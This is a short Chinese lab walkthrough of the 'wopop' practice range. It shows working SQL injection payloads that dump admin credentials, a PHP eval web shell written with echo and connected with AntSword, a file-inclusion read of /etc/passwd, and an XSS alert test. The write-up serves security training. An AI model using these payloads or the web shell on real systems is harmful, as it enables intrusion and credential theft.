wopop靶场漏洞挖掘练习

一、sql注入漏洞

1.在搜索框输入-1 union select 1,2,3#

可以看到页面有回显

2.查询数据库名

-1 union select 1,2,database()#

3.通过查询admin表的数据可以进行登录后台

-1 union select 1,2,group_concat(user_name,user_pass) from admin#

二、文件上传漏洞

1.登录后台最下面有一个上传文件

2.上传一句话木马

上传并访问一句话木马

3.使用蚁剑连接

三、命令执行漏洞

1.在shell输入框输入whoami页面会执行

2.尝试写入一句话木马

echo '<?php @eval($_POST[cmd]); ?>' > cc.php

3.访问cc.php

可以访问成功

四、文件包含漏洞

1.在关于界面可以看到url里使用file进行传参

尝试能不能访问其他文件

可以访问到/etc/passwd文件 说明存在文件包含漏洞

五、XSS漏洞

在登录页面的username处输入弹窗代码

发现可以出现弹窗 说明存在xss漏洞